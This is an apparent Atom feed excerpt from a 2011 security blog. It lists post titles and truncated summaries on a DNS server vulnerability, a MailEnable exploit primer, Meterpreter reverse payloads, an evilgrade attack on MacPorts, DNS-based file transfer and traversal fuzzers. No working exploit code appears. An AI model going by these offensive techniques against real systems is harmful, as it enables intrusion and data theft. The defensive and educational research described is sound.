scheme='http://www.blogger.com/atom/ns#' term='Security'/><title type='text'>Vulnerabilities in DNS Server Could Allow Remote Code Execution</title><summary type='text'>Released MS11-058  to address two vulnerabilities in the Microsoft DNS Service. One of the  two issues, CVE-2011-1966, could potentially allow an attacker who  successfully exploited the vulnerability to run arbitrary code on  Windows Server 2008 and Windows Server 2008 R2 DNS servers having a  particular DNS configuration. 
We’d like to share more detail in this  blog post and help you make a </summary><link rel='replies' type='application/atom+xml' href='http://c0decstuff.blogspot.com/feeds/2537378782923773108/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://c0decstuff.blogspot.com/2011/08/vulnerabilities-in-dns-server-could.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/2537378782923773108'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/2537378782923773108'/><link rel='alternate' type='text/html' href='http://c0decstuff.blogspot.com/2011/08/vulnerabilities-in-dns-server-could.html' title='Vulnerabilities in DNS Server Could Allow Remote Code Execution'/><author><name>c0decstuff</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://4.bp.blogspot.com/_rIh95t1bhWM/TTPOkIOeclI/AAAAAAAAAIk/bvBhYC2j5BU/S220/LKM3_512.png'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7832887832011382499.post-7724782383335328944</id><published>2011-08-19T07:03:00.000+08:00</published><updated>2011-08-19T07:03:17.435+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Aplication'/><title type='text'>SANS Investigate Forensic Toolkit (SIFT) Workstation v.2.1 Released</title><summary type='text'>An international team of forensics  experts, led by SANS Faculty Fellow Rob Lee, created the SANS  Investigative Forensic Toolkit (SIFT) Workstation and made it available  to the whole community as a public service. The free SIFT toolkit, that  can match any modern forensic tool suite, is also featured in SANS'  Advanced Computer Forensic Analysis and Incident Response course (FOR  508). 
It </summary><link rel='replies' type='application/atom+xml' href='http://c0decstuff.blogspot.com/feeds/7724782383335328944/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://c0decstuff.blogspot.com/2011/08/sans-investigate-forensic-toolkit-sift.html#comment-form' title='1 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/7724782383335328944'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/7724782383335328944'/><link rel='alternate' type='text/html' href='http://c0decstuff.blogspot.com/2011/08/sans-investigate-forensic-toolkit-sift.html' title='SANS Investigate Forensic Toolkit (SIFT) Workstation v.2.1 Released'/><author><name>c0decstuff</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://4.bp.blogspot.com/_rIh95t1bhWM/TTPOkIOeclI/AAAAAAAAAIk/bvBhYC2j5BU/S220/LKM3_512.png'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7832887832011382499.post-5507486253490186648</id><published>2011-07-08T04:48:00.002+08:00</published><updated>2011-07-08T05:13:53.108+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='metasploit'/><title type='text'>Breaking MailEnable 2.34: A lesson in security featuring Metasploit, Immunity Debugger, and mona.py</title><summary type='text'>Not that this is any major feat, but I thought it would do as a nice primer to investigating bugs Immunity Debugger and mona.py and exploiting them with Metasploit.


I  was researching a vulnerability today, Metasploit has a module called  mailenable_login with a target of MailEnable 2.35. Doing some research  into the exploit, it is a buffer overflow, and not just 2.35 is  vulnerable to this </summary><link rel='replies' type='application/atom+xml' href='http://c0decstuff.blogspot.com/feeds/5507486253490186648/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://c0decstuff.blogspot.com/2011/07/breaking-mailenable-234-lesson-in.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/5507486253490186648'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/5507486253490186648'/><link rel='alternate' type='text/html' href='http://c0decstuff.blogspot.com/2011/07/breaking-mailenable-234-lesson-in.html' title='Breaking MailEnable 2.34: A lesson in security featuring Metasploit, Immunity Debugger, and mona.py'/><author><name>c0decstuff</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://4.bp.blogspot.com/_rIh95t1bhWM/TTPOkIOeclI/AAAAAAAAAIk/bvBhYC2j5BU/S220/LKM3_512.png'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/-4zhrzO4K3Lw/ThUKgMTxBYI/AAAAAAAAAKI/cD1nSlXwt3A/s72-c/MailEnable%2B%2540%2B2011-07-06%2B19%253A25%253A21.png' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7832887832011382499.post-7904356551869371839</id><published>2011-07-08T04:29:00.001+08:00</published><updated>2011-07-08T04:32:55.682+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Meterpreter'/><title type='text'>Meterpreters new reverse_http and reverse_https options</title><summary type='text'>So we’ve all been unlucky enough to have a meterpreter session die on  
us, and then we’ve all been unlucky enough that we cannot re-exploit  the box using the same vulnerability for some reason or another.
No one I know in the White Hat scene likes to use any form of  persistence with a payload; and you’d be nuts to use the bind_tcp option  through fear of leaving it running. (I’ve heard horror </summary><link rel='replies' type='application/atom+xml' href='http://c0decstuff.blogspot.com/feeds/7904356551869371839/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://c0decstuff.blogspot.com/2011/07/so-weve-all-been-unlucky-enough-to-have.html#comment-form' title='1 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/7904356551869371839'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/7904356551869371839'/><link rel='alternate' type='text/html' href='http://c0decstuff.blogspot.com/2011/07/so-weve-all-been-unlucky-enough-to-have.html' title='Meterpreters new reverse_http and reverse_https options'/><author><name>c0decstuff</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://4.bp.blogspot.com/_rIh95t1bhWM/TTPOkIOeclI/AAAAAAAAAIk/bvBhYC2j5BU/S220/LKM3_512.png'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7832887832011382499.post-4008579918724939139</id><published>2011-07-08T04:18:00.004+08:00</published><updated>2011-07-08T04:35:30.151+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='metasploit'/><title type='text'>Capture all metasploit input/output</title><summary type='text'>I know how we all have our own way of copy/paste from console windows but metasploit has just introduced a new feature as of r13028.
You can now save all of the output of metasploit (including meterpreter) to a file using the spool command:

spool /root/msf3_output.txt
[OWNAGE GOES HERE]
spool off
Or to ensure you always have a log of what you are doing add to the ~/.msf3/msfconsole.rc file (</summary><link rel='replies' type='application/atom+xml' href='http://c0decstuff.blogspot.com/feeds/4008579918724939139/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://c0decstuff.blogspot.com/2011/07/capture-all-metasploit-inputoutput.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/4008579918724939139'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/4008579918724939139'/><link rel='alternate' type='text/html' href='http://c0decstuff.blogspot.com/2011/07/capture-all-metasploit-inputoutput.html' title='Capture all metasploit input/output'/><author><name>c0decstuff</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://4.bp.blogspot.com/_rIh95t1bhWM/TTPOkIOeclI/AAAAAAAAAIk/bvBhYC2j5BU/S220/LKM3_512.png'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7832887832011382499.post-1017223207593200898</id><published>2011-07-08T02:15:00.000+08:00</published><updated>2011-07-08T02:15:40.185+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Hacking'/><title type='text'>Pwning Mac OS X with evilgrade + MacPorts</title><summary type='text'>The idea of this post is to show the flaws in the packages distribution of the project MacPorts for Mac OS X
The MacPorts use:
a) To update your repository rsync server
b) The packages are distributed via http / ftp
c) Before installing a new package it is checked with the MD5/SHA1 in the local repository
To perform the attack we need to do the following tasks:1) Prepare the rsync server on the </summary><link rel='replies' type='application/atom+xml' href='http://c0decstuff.blogspot.com/feeds/1017223207593200898/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://c0decstuff.blogspot.com/2011/07/pwning-mac-os-x-with-evilgrade-macports.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/1017223207593200898'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/1017223207593200898'/><link rel='alternate' type='text/html' href='http://c0decstuff.blogspot.com/2011/07/pwning-mac-os-x-with-evilgrade-macports.html' title='Pwning Mac OS X with evilgrade + MacPorts'/><author><name>c0decstuff</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://4.bp.blogspot.com/_rIh95t1bhWM/TTPOkIOeclI/AAAAAAAAAIk/bvBhYC2j5BU/S220/LKM3_512.png'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/-YkPlTox6RQA/ThXFDaVUREI/AAAAAAAAAEs/YZRYWV1-hs0/s72-c/Screen%2Bshot%2B2011-07-06%2Bat%2B6.37.42%2BPM.png' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7832887832011382499.post-8095801834868636830</id><published>2011-07-05T08:37:00.001+08:00</published><updated>2011-07-05T08:40:25.380+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='reverse engineering'/><title type='text'>reverse engineering the google +1 button-using-firebug</title><summary type='text'>When Google released its +1 button, I wanted to be able to use it in a  PHP application. Specifically,I wanted to be able to obtain the counter  for a series of links in order to rank the links by popularity.  
Unfortunately, Google did not offer a true Google +1 API at the time (and still does not offer one as far as I know). However, given that the buttons are being displayed all over the web </summary><link rel='replies' type='application/atom+xml' href='http://c0decstuff.blogspot.com/feeds/8095801834868636830/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://c0decstuff.blogspot.com/2011/07/reverse-engineering-google-1-button.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/8095801834868636830'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/8095801834868636830'/><link rel='alternate' type='text/html' href='http://c0decstuff.blogspot.com/2011/07/reverse-engineering-google-1-button.html' title='reverse engineering the google +1 button-using-firebug'/><author><name>c0decstuff</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://4.bp.blogspot.com/_rIh95t1bhWM/TTPOkIOeclI/AAAAAAAAAIk/bvBhYC2j5BU/S220/LKM3_512.png'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7832887832011382499.post-1349952781268856868</id><published>2011-07-04T06:40:00.001+08:00</published><updated>2011-07-04T06:47:01.040+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Aplication'/><title type='text'>Advanced Nmap</title><summary type='text'>Some of the guys I hack with and I have been talking about the “core” toolset in pentesting… like what could you absolutely not go in without? What we came up with is:
nmap
metasploit
ettercap
burp
Wireshark


There are tons of tools that came close to that bracket, other proxies,  scanners, other MiTM tools, but these tools have a special place in our  hearts. These tools have encompassed so </summary><link rel='replies' type='application/atom+xml' href='http://c0decstuff.blogspot.com/feeds/1349952781268856868/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://c0decstuff.blogspot.com/2011/07/advanced-nmap.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/1349952781268856868'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/1349952781268856868'/><link rel='alternate' type='text/html' href='http://c0decstuff.blogspot.com/2011/07/advanced-nmap.html' title='Advanced Nmap'/><author><name>c0decstuff</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://4.bp.blogspot.com/_rIh95t1bhWM/TTPOkIOeclI/AAAAAAAAAIk/bvBhYC2j5BU/S220/LKM3_512.png'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7832887832011382499.post-7512075127247136670</id><published>2011-07-04T06:31:00.000+08:00</published><updated>2011-07-04T06:31:51.868+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Security'/><title type='text'>Fiddling with Chromium's new certificate pinning</title><summary type='text'>Over the past few years, there have been various high-profile incidents  and concerns with the Certificate Authority-based infrastructure that  underpins https connections. Various different efforts are underway to  tackle the problem; many are enumerated here:

http://googleonlinesecurity.blogspot.com/2011/04/improving-ssl-certificate-security.html

And in terms of things baked directly into the</summary><link rel='replies' type='application/atom+xml' href='http://c0decstuff.blogspot.com/feeds/7512075127247136670/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://c0decstuff.blogspot.com/2011/07/fiddling-with-chromiums-new-certificate.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/7512075127247136670'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/7512075127247136670'/><link rel='alternate' type='text/html' href='http://c0decstuff.blogspot.com/2011/07/fiddling-with-chromiums-new-certificate.html' title='Fiddling with Chromium&apos;s new certificate pinning'/><author><name>c0decstuff</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://4.bp.blogspot.com/_rIh95t1bhWM/TTPOkIOeclI/AAAAAAAAAIk/bvBhYC2j5BU/S220/LKM3_512.png'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7832887832011382499.post-7297283864439173395</id><published>2011-07-04T06:24:00.001+08:00</published><updated>2011-07-04T06:26:50.626+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Exploitation'/><title type='text'>Journey into Exploitation: awbo2.exe</title><summary type='text'>In this series of blog posts, I will be documenting my journey into  the art of exploitation.  My goal for this series is to experiment with  some of the challenges that are out there and hopefully provide some  guidance for others in my shoes.  I am targeting those of you with  moderate amount experience in exploitation.  
Hopefully, I will further my own knowledge and yours (the reader).
What </summary><link rel='replies' type='application/atom+xml' href='http://c0decstuff.blogspot.com/feeds/7297283864439173395/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://c0decstuff.blogspot.com/2011/07/journey-into-exploitation-awbo2exe.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/7297283864439173395'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/7297283864439173395'/><link rel='alternate' type='text/html' href='http://c0decstuff.blogspot.com/2011/07/journey-into-exploitation-awbo2exe.html' title='Journey into Exploitation: awbo2.exe'/><author><name>c0decstuff</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://4.bp.blogspot.com/_rIh95t1bhWM/TTPOkIOeclI/AAAAAAAAAIk/bvBhYC2j5BU/S220/LKM3_512.png'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7832887832011382499.post-4420288831848842845</id><published>2011-07-03T04:34:00.000+08:00</published><updated>2011-07-03T04:34:22.758+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Security'/><title type='text'>Extracting Files from a tcpdump</title><summary type='text'>Occasionally I have to analyze tcp-streams, and occasionally I came to a point where I had to extract files out of huge dumps. What I found during my last research about a year ago was not really usable - I hacked together a few lines of perl to extract exactly what I wanted - this didn't deliver exact files, but was enough to help me solve a problem.
Jim Clausing, one of the more practical </summary><link rel='replies' type='application/atom+xml' href='http://c0decstuff.blogspot.com/feeds/4420288831848842845/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://c0decstuff.blogspot.com/2011/07/extracting-files-from-tcpdump.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/4420288831848842845'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/4420288831848842845'/><link rel='alternate' type='text/html' href='http://c0decstuff.blogspot.com/2011/07/extracting-files-from-tcpdump.html' title='Extracting Files from a tcpdump'/><author><name>c0decstuff</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://4.bp.blogspot.com/_rIh95t1bhWM/TTPOkIOeclI/AAAAAAAAAIk/bvBhYC2j5BU/S220/LKM3_512.png'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7832887832011382499.post-462979593663050369</id><published>2011-07-03T04:31:00.000+08:00</published><updated>2011-07-03T04:31:27.935+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Security'/><title type='text'>How security-teams deal with leaking passwords</title><summary type='text'>Finally: I have "The List" - I even  posted where it is to find, for what I read was, that the security-teams  of the major providers affected did their work properly deactivating  all the affected accounts. http://windowslivewire.spaces.live.com/blog/cns!2F7EB29B42641D59!41528.entry?wa=wsignin1.0&amp;sa=363915619http://news.bbc.co.uk/2/hi/technology/8292928.stm
This  is currently, three days after (</summary><link rel='replies' type='application/atom+xml' href='http://c0decstuff.blogspot.com/feeds/462979593663050369/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://c0decstuff.blogspot.com/2011/07/how-security-teams-deal-with-leaking.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/462979593663050369'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/462979593663050369'/><link rel='alternate' type='text/html' href='http://c0decstuff.blogspot.com/2011/07/how-security-teams-deal-with-leaking.html' title='How security-teams deal with leaking passwords'/><author><name>c0decstuff</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://4.bp.blogspot.com/_rIh95t1bhWM/TTPOkIOeclI/AAAAAAAAAIk/bvBhYC2j5BU/S220/LKM3_512.png'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/_L52Vgx7c_mo/Ss5it_1Eg8I/AAAAAAAACBk/eNjPTIyfVbI/s72-c/pw_ebay.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7832887832011382499.post-1766744082917362404</id><published>2011-07-03T04:27:00.000+08:00</published><updated>2011-07-03T04:27:05.014+08:00</updated><title type='text'>Transfer Files and Data via DNS-Requests</title><summary type='text'>Most of you might know dnstunnel. Johannes Ullrich from Sans lists a poor mans dns-filetransfer using xxd which i think is a nice idea working on most unix boxes for xxd seems to be commonly installed. 
</summary><link rel='replies' type='application/atom+xml' href='http://c0decstuff.blogspot.com/feeds/1766744082917362404/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://c0decstuff.blogspot.com/2011/07/transfer-files-and-data-via-dns.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/1766744082917362404'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/1766744082917362404'/><link rel='alternate' type='text/html' href='http://c0decstuff.blogspot.com/2011/07/transfer-files-and-data-via-dns.html' title='Transfer Files and Data via DNS-Requests'/><author><name>c0decstuff</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://4.bp.blogspot.com/_rIh95t1bhWM/TTPOkIOeclI/AAAAAAAAAIk/bvBhYC2j5BU/S220/LKM3_512.png'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7832887832011382499.post-4644641135717138056</id><published>2011-06-23T23:27:00.001+08:00</published><updated>2011-06-23T23:27:09.719+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Security'/><title type='text'>Passive Analysis of SSH Traffic</title><summary type='text'> by Solar Designer and Dug Song
March 19, 2001
Last revised: June 6, 2010
  This article demonstrates several weaknesses in implementations of SSH (Secure Shell) protocols.  When exploited, they let the attacker obtain sensitive information by passively monitoring encrypted SSH sessions.  The information can later be used to speed up brute-force attacks on passwords, including the initial login </summary><link rel='replies' type='application/atom+xml' href='http://c0decstuff.blogspot.com/feeds/4644641135717138056/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://c0decstuff.blogspot.com/2011/06/passive-analysis-of-ssh-traffic.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/4644641135717138056'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/4644641135717138056'/><link rel='alternate' type='text/html' href='http://c0decstuff.blogspot.com/2011/06/passive-analysis-of-ssh-traffic.html' title='Passive Analysis of SSH Traffic'/><author><name>c0decstuff</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://4.bp.blogspot.com/_rIh95t1bhWM/TTPOkIOeclI/AAAAAAAAAIk/bvBhYC2j5BU/S220/LKM3_512.png'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7832887832011382499.post-8514312214714645995</id><published>2011-06-23T00:56:00.000+08:00</published><updated>2011-06-23T00:56:27.819+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Security'/><title type='text'>DotDotPwn v2.1 - The Traversal Directory Fuzzer</title><summary type='text'>These are the new features included in v2.1 (transcription of CHANGELOG.txt):
----------------
DotDotPwn v2.1
Release date: 29/Oct/2010 (PUBLIC Release at BugCon Security Conferences 2010)
Release date: 14/Oct/2010 (NON-PUBLIC Version)

Changes / Enhancements / Features:

* STDOUT module implemented to be used as you wish (Read the EXAMPLES.txt to
see some examples)
* TFTP Module implemented
* -k</summary><link rel='replies' type='application/atom+xml' href='http://c0decstuff.blogspot.com/feeds/8514312214714645995/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://c0decstuff.blogspot.com/2011/06/dotdotpwn-v21-traversal-directory.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/8514312214714645995'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/8514312214714645995'/><link rel='alternate' type='text/html' href='http://c0decstuff.blogspot.com/2011/06/dotdotpwn-v21-traversal-directory.html' title='DotDotPwn v2.1 - The Traversal Directory Fuzzer'/><author><name>c0decstuff</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://4.bp.blogspot.com/_rIh95t1bhWM/TTPOkIOeclI/AAAAAAAAAIk/bvBhYC2j5BU/S220/LKM3_512.png'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/_yWd4rUkBABM/TMdMQ3W6hYI/AAAAAAAAAIA/POBHG9JBpHQ/s72-c/ddpwn21+stdout.bmp' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7832887832011382499.post-3067535020826310391</id><published>2011-06-23T00:54:00.000+08:00</published><updated>2011-06-23T00:54:27.625+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Security'/><title type='text'>DotDotPwn - The Directory Traversal Fuzzer</title><summary type='text'>Hell Yes !!!! B-), a few weeks ago, my brother chr1x from CubilFelino Security Labs  (published a tool to detect directory traversal vulnerabilities in  FTP/HTTP servers. It only relied upon 2 .txt files (databases) with the  payloads to be lauched to the target. 
Then, some cool ideas came into my  mind, so, I wrote the c0de from the skratch and in a modular basis, as  well as, I included a lot </summary><link rel='replies' type='application/atom+xml' href='http://c0decstuff.blogspot.com/feeds/3067535020826310391/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://c0decstuff.blogspot.com/2011/06/dotdotpwn-directory-traversal-fuzzer.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/3067535020826310391'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/3067535020826310391'/><link rel='alternate' type='text/html' href='http://c0decstuff.blogspot.com/2011/06/dotdotpwn-directory-traversal-fuzzer.html' title='DotDotPwn - The Directory Traversal Fuzzer'/><author><name>c0decstuff</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://4.bp.blogspot.com/_rIh95t1bhWM/TTPOkIOeclI/AAAAAAAAAIk/bvBhYC2j5BU/S220/LKM3_512.png'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/_yWd4rUkBABM/TIm-iu0BIAI/AAAAAAAAAGw/_4Ei2KCsgQs/s72-c/ddpwn+usage.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7832887832011382499.post-6727873032232013774</id><published>2011-06-23T00:22:00.001+08:00</published><updated>2011-06-23T00:25:21.894+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Python'/><title type='text'>mitmproxy</title><summary type='text'>an SSL-capable intercepting proxy      
mitmproxy is an SSL-capable, intercepting HTTP proxy. It provides a console interface that allows traffic flows to be inspected and edited on the fly.
mitmdump is the command-line version of mitmproxy, with the same functionality but without the frills. Think tcpdump for HTTP.
Features
Intercept and modify HTTP traffic on the fly
Save HTTP conversations for </summary><link rel='replies' type='application/atom+xml' href='http://c0decstuff.blogspot.com/feeds/6727873032232013774/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://c0decstuff.blogspot.com/2011/06/mitmproxy.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/6727873032232013774'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/6727873032232013774'/><link rel='alternate' type='text/html' href='http://c0decstuff.blogspot.com/2011/06/mitmproxy.html' title='mitmproxy'/><author><name>c0decstuff</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://4.bp.blogspot.com/_rIh95t1bhWM/TTPOkIOeclI/AAAAAAAAAIk/bvBhYC2j5BU/S220/LKM3_512.png'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7832887832011382499.post-3813708020287651705</id><published>2011-06-22T01:58:00.001+08:00</published><updated>2011-06-22T01:58:54.087+08:00</updated><title type='text'>Introducing WPScan – WordPress Security Scanner</title><summary type='text'>After creating the WordPress Brute Force Tool last weekend, I decided to create a bigger project out of it, called WPScan.  WPScan is a black box WordPress Security Scanner written in Ruby  which attempts to find known security weaknesses within WordPress  installations. 
Its intended use is to be for security professionals or WordPress administrators to assess the security posture of their </summary><link rel='replies' type='application/atom+xml' href='http://c0decstuff.blogspot.com/feeds/3813708020287651705/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://c0decstuff.blogspot.com/2011/06/introducing-wpscan-wordpress-security.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/3813708020287651705'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/3813708020287651705'/><link rel='alternate' type='text/html' href='http://c0decstuff.blogspot.com/2011/06/introducing-wpscan-wordpress-security.html' title='Introducing WPScan – WordPress Security Scanner'/><author><name>c0decstuff</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://4.bp.blogspot.com/_rIh95t1bhWM/TTPOkIOeclI/AAAAAAAAAIk/bvBhYC2j5BU/S220/LKM3_512.png'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7832887832011382499.post-1291352882809766451</id><published>2011-06-22T01:53:00.000+08:00</published><updated>2011-06-22T01:53:19.019+08:00</updated><title type='text'>Tomahawk, your IDS/Firewall Best Friend</title><summary type='text'>“Tomahawk” is the name of a popular cruise missile developed by General Dynamics in the seventies. But it is also the name of a free tool which helps to stress test security devices like firewalls or IDS. It has been written by Brian Smith from TippingPoint. This is a well-known manufacturer of IDS solutions, acquired by HP in 2010.
